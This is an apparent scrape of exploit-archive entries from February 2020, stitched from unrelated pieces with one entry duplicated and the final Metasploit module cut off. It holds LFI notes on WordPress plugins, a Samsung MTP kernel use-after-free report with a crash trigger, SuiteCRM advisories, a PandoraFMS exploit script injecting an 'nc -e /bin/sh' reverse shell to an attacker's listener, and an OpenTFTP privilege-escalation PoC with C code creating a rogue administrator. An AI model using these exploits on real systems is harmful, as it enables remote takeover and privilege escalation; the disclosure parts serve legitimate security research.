[-] Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.12
[-] vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com

Samsung: UAF via missing locking in SEND_FILE_WITH_HEADER handler in f_mtp_samsung.c

Tested on a Samsung A50 (SM-A505FN), running build
\"samsung/a50xx/a50:9/PPR1.180610.011/A505FNXXS3ASK9:user/release-keys\", security
patch level 2019-11-01.


Samsung's kernel tree contains two implementations of device-side MTP. One of
them (drivers/usb/gadget/function/f_mtp.c), based on its copyright headers,
seems to be from Google, but this one is disabled at build time.
The second one is drivers/usb/gadget/function/f_mtp_samsung.c.
Both of them have ioctl handlers that handle the ioctl command
SEND_FILE_WITH_HEADER; the Google version runs this handler under a lock, the
Samsung version doesn't hold any locks at this point.

In both MTP implementations, the SEND_FILE_WITH_HEADER handler first looks up a
file from a user-supplied file descriptor, then stashes a pointer to that file
in a struct, posts work to a workqueue to actually send data from the file to
the USB device, waits for the work item to be processed, and then drops its
reference on the file.


By the way, this entire dance with the work queue is probably completely
unnecessary. The Google version of the code has a comment that says:

        /* We do the file transfer on a work queue so it will run
         * in kernel context, which is necessary for vfs_read and
         * vfs_write to use our buffers in the kernel address space.
         */

But that's wrong - if you want to do read/write with kernel buffers, you can
just use kernel_read()/kernel_write() instead of vfs_read()/vfs_write() and
everything should work just fine. (Or on older kernel before v4.14, use
set_fs(KERNEL_DS) manually.)


The problem is that the Samsung version runs this code without holding any
locks:

        file = fget(info.Fd);
        if (!file) {
                status = -EBADF;
                printk(KERN_DEBUG \"[%s] line=[%d] bad file number\
\",
                                                __func__, __LINE__);
                goto exit;
        }

        dev->read_send_file = file;
        dev->read_send_length = info.Length;
        smp_wmb();

        work = &dev->read_send_work;
        dev->read_send_cmd = info.Code;
        dev->read_send_id = info.TransactionID;
        queue_work(dev->wq, work);
        /* Wait for the work to be complted on work queue */
        flush_workqueue(dev->wq);

        fput(file);

This means that two threads can race like this (prefixed with a thread
identifier):

[1] file = fget(info.Fd);
[1] if (!file) {
[1]         status = -EBADF;
[1]         printk(KERN_DEBUG \"[%s] line=[%d] bad file number\
\",
[1]                                         __func__, __LINE__);
[1]         goto exit;
[1] }
[1] 
[1] dev->read_send_file = file;
[1] dev->read_send_length = info.Length;
[1] smp_wmb();
[2] file = fget(info.Fd);
[2] if (!file) {
[2]         status = -EBADF;
[2]         printk(KERN_DEBUG \"[%s] line=[%d] bad file number\
\",
[2]                                         __func__, __LINE__);
[2]         goto exit;
[2] }
[2] 
[2] dev->read_send_file = file;
[2] dev->read_send_length = info.Length;
[2] smp_wmb();
[2] 
[2] work = &dev->read_send_work;
[2] dev->read_send_cmd = info.Code;
[2] dev->read_send_id = info.TransactionID;
[2] queue_work(dev->wq, work);
[2] /* Wait for the work to be complted on work queue */
[2] flush_workqueue(dev->wq);
[2] 
[2] fput(file);
[1] 
[1] work = &dev->read_send_work;
[1] dev->read_send_cmd = info.Code;
[1] dev->read_send_id = info.TransactionID;
[1] queue_work(dev->wq, work);
[1] /* Wait for the work to be complted on work queue */
[1] flush_workqueue(dev->wq);
[1] 
[1] fput(file);

If a race like this occurs, then by the time thread [1] reaches queue_work(),
dev->read_send_file no longer holds a reference and may have already been freed.


To reproduce this, you need to have a rooted phone.
Next, you need to run a helper on the host that consumes all the incoming USB
bulk messages on the MTP interface. Code for the helper:

================================================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <err.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <linux/usbdevice_fs.h>
#include <linux/usb/ch9.h>

int main(int argc, char **argv) {
  if (argc != 4) {
    printf(\"usage: %s /dev/bus/usb/<bus>/<device> <interface-id> <endpoint-id (0-15)>\
\");
    return 1;
  }
  int fd = open(argv[1], O_RDWR);
  if (fd == -1) err(1, \"open('%s')\", argv[1]);
  int interface = strtol(argv[2], NULL, 0);
  int endpoint = strtol(argv[3], NULL, 0);
  if (ioctl(fd, USBDEVFS_CLAIMINTERFACE, &interface))
    err(1, \"claim interface\");
  while (1) {
    char buf[0x200];
    struct usbdevfs_bulktransfer transfer = {
      .ep = endpoint | USB_DIR_IN,
      .len = sizeof(buf),
      .data = buf
    };
    int len = ioctl(fd, USBDEVFS_BULK, &transfer);
    if (len < 0) {
      err(1, \"USBDEVFS_BULK\");
    } else {
      printf(\"got %d\
\", len);
    }
  }
}
================================================================================

To use the helper, you need the bus and device numbers from lsusb. The interface
ID (bInterfaceNumber) and endpoint ID (bEndpointAddress & 0xf) are 0 and 1, but
you can also find them with lsusb. Usage example:

================================================================================
$ lsusb | grep Samsung
Bus 001 Device 092: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy series, misc. (MTP mode)
$ lsusb -d 04e8:6860 -v | egrep 'Interface Descriptor|bInterfaceNumber|iInterface|Endpoint Descriptor|bEndpointAddress'
    Interface Descriptor:
      bInterfaceNumber        0
      iInterface              5 MTP
      Endpoint Descriptor:
        bEndpointAddress     0x81  EP 1 IN
      Endpoint Descriptor:
        bEndpointAddress     0x01  EP 1 OUT
      Endpoint Descriptor:
        bEndpointAddress     0x82  EP 2 IN
    Interface Descriptor:
      bInterfaceNumber        1
      iInterface              6 CDC Abstract Control Model (ACM)
      Endpoint Descriptor:
        bEndpointAddress     0x84  EP 4 IN
    Interface Descriptor:
      bInterfaceNumber        2
can't get debug descriptor: Resource temporarily unavailable
      iInterface              7 CDC ACM Data
      Endpoint Descriptor:
        bEndpointAddress     0x83  EP 3 IN
      Endpoint Descriptor:
        bEndpointAddress     0x02  EP 2 OUT
    Interface Descriptor:
      bInterfaceNumber        3
      iInterface             10 ADB Interface
      Endpoint Descriptor:
        bEndpointAddress     0x03  EP 3 OUT
      Endpoint Descriptor:
        bEndpointAddress     0x85  EP 5 IN
$ gcc -o usbread usbread.c && ./usbread /dev/bus/usb/001/092 0 1
================================================================================

Now compile the following PoC for the phone:
================================================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
#include <stdint.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>

/* from kernel headers */
struct read_send_info {
  int Fd;/* Media File fd */
  uint64_t Length;/* the valid size, in BYTES, of the container  */
  uint16_t Code;/* Operation code, response code, or Event code */
  uint32_t TransactionID;/* host generated number */
};
#define SEND_FILE_WITH_HEADER 11

/* print error and abort if syscall returned error code */
#define SYSCHK(x) ({                      \\
  typeof(x) __res = (x);                  \\
  if ((long)__res == -1)                  \\
    err(1, \"SYSCHK: %s\", #x);             \\
  __res;                                  \\
})

// ensure that when the main process is killed via something like ^C, the entire
// process tree dies relatively quickly
static void set_pdeathsig(void) {
  SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
  if (getppid() == 1) errx(1, \"parent went away immediately\");
}

static int dev_fd = -1;

static void collide(void) {
  while (1) {
    int data_fd = SYSCHK(open(\"/system/bin/sh\", O_RDONLY));
    struct read_send_info info = {
      .Fd = data_fd,
      .Length = 1
    };
    ioctl(dev_fd, SEND_FILE_WITH_HEADER, &info);
    close(data_fd);
  }
}

int main(void) {
  dev_fd = SYSCHK(open(\"/dev/usb_mtp_gadget\", O_RDWR));
  for (int i=0; i<31; i++) {
    pid_t child = SYSCHK(fork());
    if (child == 0) {
      set_pdeathsig();
      collide();
      return 0;
    }
  }
  collide();

  return 0;
}
================================================================================

Compile and use it like this:

================================================================================
$ aarch64-linux-gnu-gcc -static -o samsung_mtp_trigger samsung_mtp_trigger.c -Wall
$ adb push samsung_mtp_trigger /data/local/tmp/
samsung_mtp_trigger: 1 file pushed. 17.2 MB/s (578328 bytes in 0.032s)
$ adbs shell
a50:/ $ su
a50:/ # ps -AZ | grep Mtp
u:r:system_app:s0              system        7587  4068 4272384 163484 ep_poll             0 S com.samsung.android.MtpApplication
a50:/ # kill 7587
a50:/ # /data/local/tmp/samsung_mtp_trigger
$
================================================================================

... and now your phone should crash pretty quickly (something like a second).


To demonstrate that this is actually a UaF, here are snippets from last_kmsg:

================================================================================
<0>[13278.841349]  [3:  kworker/u16:9:17680] Unable to handle kernel read from unreadable memory at virtual address 00000160
[...]
<4>[13278.841899]  [3:  kworker/u16:9:17680] CPU: 3 PID: 17680 Comm: kworker/u16:9 Tainted: G        W       4.14.62-16641116 #1
<4>[13278.841910]  [3:  kworker/u16:9:17680] Hardware name: Samsung A50 SWA OPEN rev04 board based on Exynos9610 (DT)
<4>[13278.841941]  [3:  kworker/u16:9:17680] Workqueue: mtp_read_send read_send_work
<4>[13278.841954]  [3:  kworker/u16:9:17680] task: ffffffc012aa6300 task.stack: ffffff800cf28000
<4>[13278.841969]  [3:  kworker/u16:9:17680] PC is at rw_verify_area+0x2c/0xc4
<4>[13278.841980]  [3:  kworker/u16:9:17680] LR is at vfs_read+0x78/0x138
<4>[13278.841991]  [3:  kworker/u16:9:17680] pc : [<ffffff80082caa0c>] lr : [<ffffff80082cacf4>] pstate: 00400145
<4>[13278.842001]  [3:  kworker/u16:9:17680] sp : ffffff800cf2bc90
<4>[13278.842011]  [3:  kworker/u16:9:17680] x29: ffffff800cf2bca0 x28: 000000000000000c 
<4>[13278.842024]  [3:  kworker/u16:9:17680] x27: 0000000000000000 x26: 0000000000000000 
<4>[13278.842037]  [3:  kworker/u16:9:17680] x25: ffffffc02e164c00 x24: ffffff80090bd369 
<4>[13278.842050]  [3:  kworker/u16:9:17680] x23: ffffffc012aa6300 x22: ffffffc01d41800c 
<4>[13278.842063]  [3:  kworker/u16:9:17680] x21: 0000000000000001 x20: 0000000000000000 
<4>[13278.842075]  [3:  kworker/u16:9:17680] x19: ffffffc800e5b680 x18: 000000000000270f 
<4>[13278.842088]  [3:  kworker/u16:9:17680] x17: 0000000000484728 x16: 0000000000000000 
<4>[13278.842101]  [3:  kworker/u16:9:17680] x15: 00000000000000e6 x14: 0000000000000058 
<4>[13278.842114]  [3:  kworker/u16:9:17680] x13: 000000000003a700 x12: dead000000000200 
<4>[13278.842127]  [3:  kworker/u16:9:17680] x11: dead000000000100 x10: 0000000000000000 
<4>[13278.842140]  [3:  kworker/u16:9:17680] x9 : 0000000000000001 x8 : ffffffffffffffff 
<4>[13278.842153]  [3:  kworker/u16:9:17680] x7 : 682b6874656c2009 x6 : ffffff80f61229b6 
<4>[13278.842166]  [3:  kworker/u16:9:17680] x5 : 0000000000004510 x4 : 000000000000000c 
<4>[13278.842178]  [3:  kworker/u16:9:17680] x3 : 0000000000000001 x2 : 0000000000000000 
<4>[13278.842191]  [3:  kworker/u16:9:17680] x1 : ffffffc800e5b680 x0 : 0000000000000000 
[...]
<4>[13278.845924]  [3:  kworker/u16:9:17680] X19: 0xffffffc800e5b580:
[...]
<4>[13278.846172]  [3:  kworker/u16:9:17680] b680 : 00000000 00000000 082CEE70 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846200]  [3:  kworker/u16:9:17680] b6a0 : 00000000 00000000 08D55700 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846228]  [3:  kworker/u16:9:17680] b6c0 : 00020000 0802801D 00000000 00000000 00000000 00000000 00E5B6D8 FFFFFFC8
<4>[13278.846256]  [3:  kworker/u16:9:17680] b6e0 : 00E5B6D8 FFFFFFC8 00000000 00000000 00000000 00000000 00000000 00000000
<4>[13278.846285]  [3:  kworker/u16:9:17680] b700 : 00000000 00000000 00000000 00000000 7F56D500 FFFFFFC8 00000000 00000000
<4>[13278.846313]  [3:  kworker/u16:9:17680] b720 : 00000000 00000000 00000020 00000000 FFFFFFFF FFFFFFFF 00000000 00000000
<4>[13278.846341]  [3:  kworker/u16:9:17680] b740 : 00000000 00000000 00000000 00000000 00E5B750 FFFFFFC8 00E5B750 FFFFFFC8
<4>[13278.846369]  [3:  kworker/u16:9:17680] b760 : 00E5B760 FFFFFFC8 00E5B760 FFFFFFC8 6458BCF0 FFFFFFC8 00000000 00000000
================================================================================

The crash is in rw_verify_area() and is caused by file->f_inode being NULL. The
file pointer is in X19; by looking at X19, we can see that it indeed looks like
a struct file that was just freed (some pointers have been nulled by __fput(),
and the refcount is zero):

================================================================================
                                                                                        mnt               dentry
<4>[13278.846172]  [3:  kworker/u16:9:17680] b680 : 00000000 00000000 082CEE70 FFFFFF80 00000000 00000000 00000000 00000000
                                                    inode             f_op                                counter
<4>[13278.846200]  [3:  kworker/u16:9:17680] b6a0 : 00000000 00000000 08D55700 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846228]  [3:  kworker/u16:9:17680] b6c0 : 00020000 0802801D 00000000 00000000 00000000 00000000 00E5B6D8 FFFFFFC8
<4>[13278.846256]  [3:  kworker/u16:9:17680] b6e0 : 00E5B6D8 FFFFFFC8 00000000 00000000 00000000 00000000 00000000 00000000
<4>[13278.846285]  [3:  kworker/u16:9:17680] b700 : 00000000 00000000 00000000 00000000 7F56D500 FFFFFFC8 00000000 00000000
<4>[13278.846313]  [3:  kworker/u16:9:17680] b720 : 00000000 00000000 00000020 00000000 FFFFFFFF FFFFFFFF 00000000 00000000
<4>[13278.846341]  [3:  kworker/u16:9:17680] b740 : 00000000 00000000 00000000 00000000 00E5B750 FFFFFFC8 00E5B750 FFFFFFC8
<4>[13278.846369]  [3:  kworker/u16:9:17680] b760 : 00E5B760 FFFFFFC8 00E5B760 FFFFFFC8 6458BCF0 FFFFFFC8 00000000 00000000
================================================================================


Reporting this as a security bug since /dev/usb_mtp_gadget is reachable from a
privileged, but not-root-equivalent context:

a50:/ # ls -laZ /dev/usb_mtp_gadget
crw-rw---- 1 system mtp u:object_r:mtp_device:s0 10,  27 2019-12-14 03:12 /dev/usb_mtp_gadget

(allow mediaprovider mtp_device (chr_file (ioctl read write getattr lock append map open)))


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: jannh@google.com

[-] Title  : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
[-] Author : mehran feizi
[-] Category : Webapps
[-] Date : 2020-02-11
[-] vendor home page: https://wordpress.org/plugins/ultimate-member/

Vulnerable Page:
/class-admin-upgrade.php


Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR .
$_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';


Exploit:
localhost/wp-content/plugins/worprees plugin bug
dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>

---------------------------------------------------------------------
SuiteCRM <= 7.11.11 Second-Order PHP Object Injection Vulnerabilities
---------------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerabilities Description:

1) The vulnerability exists because the 
"EmailsControllerActionGetFromFields::getEmailSignatures()” method
is using the unserialize() function with the "account_signatures” user 
preference, and such a value can be
arbitrarily manipulated by evil users through the EmailUIAjax interface. 
This can be exploited to inject
arbitrary PHP objects into the application scope, allowing an attacker 
to perform a variety of attacks,
such as executing arbitrary PHP code.

2) The vulnerability exists because the 
"EmailsControllerActionGetFromFields::handleActionGetFromFields()”
method is using the unserialize() function with the "showFolders” user 
preference, and such a value can be
arbitrarily manipulated by evil users through the EmailUIAjax interface. 
This can be exploited to inject
arbitrary PHP objects into the application scope, allowing an attacker 
to perform a variety of attacks,
such as executing arbitrary PHP code.


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no 
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8800 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-01

-----------------------------------------------------------------
SuiteCRM <= 7.11.11 Multiple Phar Deserialization Vulnerabilities
-----------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through the "backup_dir" parameter when handling 
the "Backups" action
within the "Administration" module is not properly sanitized before 
being used in a file
operation. This can be exploited by malicious users to inject arbitrary 
PHP objects into
the application scope (PHP Object Injection via phar:// stream wrapper), 
allowing them to
carry out a variety of attacks, such as executing arbitrary PHP code. 
Successful
exploitation of this vulnerability requires a System Administrator 
account.

2) User input passed through the "file_name" parameter when handling the 
"step3″ action
within the "Import" module is not properly sanitized before being used 
in a file operation.
This can be exploited by malicious users to inject arbitrary PHP objects 
into the application
scope (PHP Object Injection via phar:// stream wrapper), allowing them 
to carry out a variety
of attacks, such as executing arbitrary PHP code.

3) User input passed through the "load_module_from_dir" parameter when 
handling the
"UpgradeWizard" action within the "Administration" module is not 
properly sanitized before
being used in a file operation. This can be exploited by malicious users 
to inject arbitrary
PHP objects into the application scope (PHP Object Injection via phar:// 
stream wrapper),
allowing them to carry out a variety of attacks, such as executing 
arbitrary PHP code.
Successful exploitation of this vulnerability requires a System 
Administrator account.

4) User input passed through the "file_name" parameter when handling the 
"UploadFileCheck"
action within the "UpgradeWizard" module is not properly sanitized 
before being used in a
file operation. This can be exploited by malicious users to inject 
arbitrary PHP objects
into the application scope (PHP Object Injection via phar:// stream 
wrapper), allowing them
to carry out a variety of attacks, such as executing arbitrary PHP code. 
Successful
exploitation of this vulnerability would require a System Administrator 
account.
However, due to KIS-2020-04 it could be exploited by any user.


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no 
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8801 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-02

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947

#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to  one of the following ip_src, dst_port, src_port

Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947

'''
import requests
import sys

if len(sys.argv) < 6:
  print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
  exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + '' + sys.argv[5] + '' + '#'

login = {
'nick':user,
'pass':password,
'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)

payload = {
'date':"",
'time':"",
'period':"",
'interval_length':"",
'chart_type':"",
'max_aggregates':"1",
'address_resolution':"0",
'name':"",
'assign_group':"0",
'filter_type':"0",
'filter_id':"0",
'filter_selected':"0",
'ip_dst':payload,
'ip_src':"",
'dst_port':"",
'src_port':"",
'advanced_filter':"",
'aggregate':"dstip",
'router_ip':"",
'output':"bytes",
'draw_button':"Draw"
}

print "[+] Sendin exploit ..."

exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})

if exploit.status_code == 200:
  print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
  print "[-] Couldn't send the HTTP request, try again."

--------------------------------------------------------------------------
SuiteCRM <= 7.11.11 (action_saveHTMLField) Bean Manipulation 
Vulnerability
--------------------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerability Description:

The vulnerability exists because the 
"HomeController::action_saveHTMLField()" method allows
to create new beans or modify arbitrary beans' fields. This can result 
in second-order SQL
Injections or PHP Object Injection attacks.


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no 
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8802 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-03

# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author:  boku
# Date: 2020-02-12
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link:   https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version:         1.66
# Tested On:       Windows 10 (32-bit)

# About:           
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, 
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/

# Vulnerability Details:
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. 
# This allows a low-privilge, local attacker to escalate their permissions to Administrator; 
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. 
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the 
# default installation. After the attacker has planted the malicious binary, the code will 
# be executed with System priviledges on the next boot of the windows device. See PoC below for details.

## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Open TFTP Single Port Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                  BUILTIN\Users:(OI)(CI)(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C
                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(I)(M)

## Local Privilege Escalation Proof of Concept
#0.  Download & install Open TFTP Server v1.66

#1.  Create low privileged user & change to the user
  C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
  User name                    lowPrivUser
  Local Group Memberships      *Users
  Global Group memberships     *None
  C:\>whoami
  mycomputer\lowprivuser 

#2.  Move the Service EXE to a new name
  C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
        1 file(s) moved.

#3.  Create malicious binary on kali linux
  1) Download dependencies
   root@kali# apt install gcc-mingw-w64-i686 wine64 -y
  2) Add Admin User C Code
   root@kali# cat addAdmin.c
   #include<windows.h>
   int main(void){
    system("net user hacker mypassword /add");
    system("net localgroup Administrators hacker /add");
    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
    return 0;
   }
  3) Compile Code
   root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe

#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host 

#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
  C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
        1 file(s) moved.
  C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
  02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
  02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe

#6. Reboot the Computer

#7. Look at that new Admin
  C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
  User name                    hacker
  Account active               Yes
  Local Group Memberships      *Administrators       *Users

  C:\Users\lowPrivUser>net localgroup Administrators
  Alias name     Administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator
  boku
  hacker

------------------------------------------------------------------------------
SuiteCRM <= 7.11.11 (add_to_prospect_list) Broken Access Control 
Vulnerability
------------------------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerability Description:

There is a Local File Inclusion vulnerability within the 
"add_to_prospect_list" function. User input
passed through the "parent_module" and "parent_type" parameters is not 
properly validated before
being used in a call to the include() function. This can be exploited to 
include arbitrary .php
files within the webroot and potentially bypass authorization mechanisms 
(for instance, by setting
the "parent_module" parameter to "Administration" and the "parent_type"
parameter to "expandDatabase"
or any other administrative action which does not implement ACL checks).


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no 
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8803 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-04

----------------------------------------------------------
SuiteCRM <= 7.11.10 Multiple SQL Injection Vulnerabilities
----------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.10 and prior versions.


[-] Vulnerabilities Description:

1) The vulnerability is located within the SOAP API, specifically into 
the set_entries() SOAP
function. User input passed through the "name_value_lists" parameter 
(specifically the "first_name"
and "last_name" elements) isn’t properly sanitized before being used to 
construct a SQL query from
within the check_for_duplicate_contacts() function. This can be 
exploited by malicious users to e.g.
read sensitive data from the database through in-bound SQL injection 
attacks.

2) The vulnerability is located within the EmailUIAjax interface. User 
input passed through the
"bean_module" and "bean_id" parameters when handling the "addContact"
action isn’t properly sanitized
before being used to construct a SQL query. This can be exploited by 
malicious users to read sensitive
data from the database through boolean-based SQL injection attacks.

3) The vulnerability is located within the EmailUIAjax interface. User 
input passed through the
"contactData" parameter when handling the "addContactsMultiple" action 
isn’t properly sanitized
before being used to construct a SQL query. This can be exploited by 
malicious users to read
sensitive data from the database through boolean-based SQL injection 
attacks.

4) The vulnerability is located within the EmailUIAjax interface. User 
input passed through the "ids"
parameter when handling the "removeContact" action isn’t properly 
sanitized before being used to
construct a SQL query. This can be exploited by malicious users to read 
sensitive data from the database
through time-based SQL injection attacks.

5) The vulnerability is located within the MailMerge module. User input 
passed through the "rel_module"
parameter when handling the "search" action isn’t properly sanitized 
before being used to construct a
SQL query. This can be exploited by malicious users to read sensitive 
data from the database through
time-based SQL injection attacks.


[-] Solution:

Upgrade to version 7.11.11 or later.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no 
response
[07/02/2020] - CVE number assigned
[10/02/2020] - Version 7.11.11 released
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8804 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-05

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
